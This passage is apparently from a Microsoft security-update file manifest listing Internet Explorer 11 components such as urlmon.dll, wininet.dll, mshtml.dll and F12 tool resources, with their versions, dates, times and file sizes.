11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20038| 17-May-2021| 23:57| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20038| 17-May-2021| 21:39| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20038| 17-May-2021| 23:58| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niedkcs32.dll| 18.0.9600.20038| 17-May-2021| 21:49| 333,312 \ninstall.ins| Not versioned| 17-May-2021| 20:00| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20038| 17-May-2021| 21:28| 710,656 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 20:55| 489,472 \niedvtool.dll| 11.0.9600.20038| 17-May-2021| 22:47| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:52| 38,912 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:36| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:31| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 4,096 \nF12.dll.mui| 11.0.9600.20038| 17-May-2021| 23:58| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Resources.dll| 11.0.9600.18939| 10-Feb-2018| 9:17| 10,948,096 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:17| 1,207,808 \nmsfeeds.dll| 11.0.9600.20038| 17-May-2021| 21:50| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20038| 17-May-2021| 22:47| 20,294,656 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:40| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nieetwcollector.exe| 11.0.9600.18666| 16-Apr-2017| 0:47| 104,960 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 2:19| 4,096 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20038| 17-May-2021| 21:32| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 19:58| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 19:58| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 19:58| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 19:58| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:36| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 17-May-2021| 23:17| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20038| 17-May-2021| 22:08| 1,399,296 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:18| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:19| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20038| 17-May-2021| 22:19| 2,308,608 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:11| 692,224 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:23| 154,112 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 124,928 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:11| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20038| 17-May-2021| 23:58| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll| 11.0.9600.20038| 17-May-2021| 21:55| 13,881,856 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:40| 24,486 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:38| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \ninetcomm.dll| 6.3.9600.20038| 17-May-2021| 21:54| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \njscript9.dll| 11.0.9600.20038| 17-May-2021| 22:02| 4,112,896 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20038| 17-May-2021| 22:11| 653,824 \nvbscript.dll| 5.8.9600.20038| 17-May-2021| 22:20| 498,176 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20038| 17-May-2021| 21:37| 2,882,048 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 21:22| 108,544 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 19:18| 65,024 \nurlmon.dll| 11.0.9600.20038| 17-May-2021| 21:39| 1,563,136 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 23:30| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 21:51| 43,008 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:35| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:01| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:20| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:00| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:58| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:02| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 52,736 \nwininet.dll.mui| 11.0.9600.20038| 18-May-2021| 1:26| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nhtml.iec| 2019.0.0.20038| 17-May-2021| 22:30| 417,280 \ninetcpl.cpl| 11.0.9600.20038| 17-May-2021| 21:50| 2,132,992 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:33| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.20038| 18-May-2021| 1:26| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:06| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 